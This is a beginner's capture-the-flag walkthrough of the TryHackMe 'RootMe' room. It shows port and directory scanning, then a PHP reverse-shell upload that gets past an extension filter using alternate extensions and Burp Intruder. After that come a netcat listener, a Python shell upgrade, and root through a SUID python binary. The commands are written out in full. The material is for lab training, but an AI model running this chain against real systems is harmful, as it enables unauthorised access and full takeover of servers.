TryHackMe: RootMe Write-up

by

In this write-up I show how to complete the RootMe room on THM.
It’s a beginner CTF challenge, that was a lot of fun! Let’s connect to our THM OpenVPN network and start hacking!!

Task 1 – Deploy the machine
Deploy the machine, and you will get your machine IP address.

Task 2 – Reconnaissance
Let’s get some information about the target.
I’ll start pinging to the target, to check communication and to see which machine it is.

ping -c 1 <machine_ip>

If the TTL is less than 64 and greater than 1, then it is linux host.
If the TTL is greater than 64 and less than 128, then it is windows host.
If the TTL is between 128 and 255, then it is network appliance.

Nmap Scan:

We will now use the T1595: Active Scanning (MITRE ATT&CK) technique to gather information that may be useful to us.

nmap -vvv -Pn -sCV -p0-65535 –reason -oN rootme.nmap <machine_ip>

There are 2 ports open.

22/ssh – OpenSSH 7.6p1, 80/http – Apache2.4.29

#2.1 Scan the machine, how many ports are open?
2

#2.2 What version of Apache is running?
2.4.29

#2.3 What service is running on port 22?
ssh

Gobuster:

We will now use the T1083: File and Directory Discovery (MITRE ATT&CK) technique to find directories on the web server using the GoBuster tool.

gobuster dir -u http://<machine_ip> -w <wordlist_file>

And we can see that there is an interesting folder:

/panel/

#2.4 Find directories on the web server using the GoBuster tool.
No answer needed.

#2.5 What is the hidden directory?
/panel

Task 3 – Getting a shell

We need to find a form to upload and get a reverse shell, and find the flag.
Navigate to the hidden directory in the URL http://<machine_ip>/panel/
And we can upload here our form to get a reverse shell:

http://<machine_ip>/panel/

For this task I will upload php reverse shell script.
I usually use pentestmonkey to try get reverse shell using netcat.

Git clone to download the script in terminal:
https://github.com/pentestmonkey/php-reverse-shell

git clone https://github.com/pentestmonkey/php-reverse-shell.git

Change your directory to the php-reverse-shell folder and make your php-reverse-shell script executable by using the following command:

chmod +x php-reverse-shell.php

chmod +x php-reverse-shell.php

Open the php reverse shell script in editor and change the $ip parameter’s value and $port parameter’s value to your host machine’s IP and port you want to listen on.

php-reverse-shell.php

Now you have configured the script. We will proceed further and upload the file.

PHP file is not allowed!

Upload failed! This is because php files is not allowed to be uploaded.
We’ll go do a little google search on it.

file name bypass – google it

And we can see some other extensions that we can use to use php.

.php, .php2, .php3, .php4, .php5, ,php6, .php7, .phps, .pht, .phtm, .phtml, .pgif, .shtml…

BurpSuite:

So in case of T1110: Brute Force (MITRE ATT&CK) technique I’ll use the BurpSuite tool.

Let’s make sure to run the BurpSuite tool.
And what I did actually captured the request and sent it to intruder, cleared all the selections and only added the .php extension so that when I did my sniper attack it would change the php to whatever I decide to change.

Intruder – BurpSuite

On the payloads screen I added other extensions (see above) for it to try brute force it.

extensions

I will start the attack and see in the results, that the length is greater than the length of .php.

results

We will rename the script file using the command:
mv <filename.php> <filename.specific_ext_from_the_list>

mv php-reverse-shell.php php-reverse-shell.php2

Now let’s try uploading the script again.

success

We have successfully uploaded the script.
Now we need to start a listener on netcat. I am using 1234 port and I have already inserted the same port and host IP of my machine in the script that we edited and uploaded.

netcat:

nc -lvnp 1234

Now we have to gain shell by executing the uploaded script in the http://<machine_ip>/uploads/ directory that we found earlier (see above).

We can also see here all the files that actually passed successfully using the brute force we did with the BurpSuite tool.

Just click on one of them (some of them are not working properly, .php5, .phtml are working from my test) and check back your netcat listener.

connect to <machine_host> from <target_host>
I told you we’ll succeed in the end!

But the shell looks a little uncomfortable.
So we’re going to upgrade it using Python.

Python:

First we’ll check if we have Python.

which python

And we can see we have Python.
We will now upgrade our shell using the Python -c (cmd) flag.

python -c ‘import pty;pty.spawn(“/bin/bash”)’

And we can see that we have upgraded our shell to bash.
We will try to search for the user.txt file using find command.

find / -iname user.txt

We’ll try to look for something that has access, like /var/www/user.txt.

/var/www/user.txt

Navigate to /var/www/user.txt.

cat /var/www/user.txt

#3.1 user.txt
THM{XXXXXXXXXXXXXXX}

Task 4 – Privilege escalation

We are going to use T1548.001: Abuse Elevation Control Mechanism: SUID and SGID (MITRE ATT&CK) technique.

find / -type f -user root \( -perm -4000 -o -perm -2000 \) 2>/dev/null

We have the /usr/bin/python wtih SUID permission.

#4.1 user.txt
/usr/bin/python

We will try to escalate our privileges.
To do this we will Google for GTFOBINS.
And look for python there.

Read the description before doing something.
We can skip the command as the binary has already SUID permission.
Just write the second command.
python -c ‘import os; os.execl(“/bin/bash”, “bash”, “-p”)’

We have successfully escalated our privileges and we can confirm we are root.

#4.2 Find a form to escalate your privileges
No answer needed.

Let’s get our root flag.
Navigate to /root/ directory to find your root.txt.

root.txt

#4.3 root.txt
THM{XXXXXXXXXXXXXXXXXXXX}

Congratulations on completing the room successfully!

I would be happy if you like and comment.
I really enjoyed doing this content for you
Be careful, the internet world is big.

-Chai Geydarov

Leave a Comment